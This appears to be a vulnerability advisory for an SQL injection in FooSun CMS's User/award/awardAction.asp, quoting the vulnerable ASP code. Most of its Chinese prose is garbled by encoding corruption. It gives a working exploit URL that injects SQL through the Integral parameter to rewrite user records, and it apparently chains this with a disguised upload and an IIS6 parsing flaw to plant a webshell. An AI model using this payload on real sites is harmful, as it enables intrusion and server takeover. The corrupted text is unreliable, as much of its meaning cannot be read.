ѶawardAction.aspҳSQLע©

[ѶawardAction.aspҳSQLע© ȫ]
Ӱ汾:
FooSun > 5.0

: 
FoosunCMSһǿĹܵĻASP+ACCESS/MSSQLܵݹ

©:


ļ\User\award\awardAction.aspУIntegral=NoSqlHack(request.QueryString("Integral")) //14if action="join" thenUser_Conn.execute("Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values("&CintStr(prizeID)&",''"&session("FS_UserNumber")&"'',"&CintStr(awardID)&")")''õǰμ--------------------------------User_Conn.execute("Update FS_ME_Users set Integral=(Integral-"&Integral&") where usernumber=''"&session("FS_UserNumber")&"''")ֱIntegralʹùַĺ˵sqlע©Ĳ¿޸ıFS_ME_Userݣϵͳܿõwebshell

©: 

עû½󣬷Url:http://www.sitedir.com.cn/User/award/awardAction.asp?action=join&awardID=1&prizeID=1&Integral=0),usernumber= 0x6C006C002E00610073007000,LoginNum=(1˳ٵ½ļϴ׺ΪdocwebshellͿõwebshellIIS6ļΪ*.aspĽ©
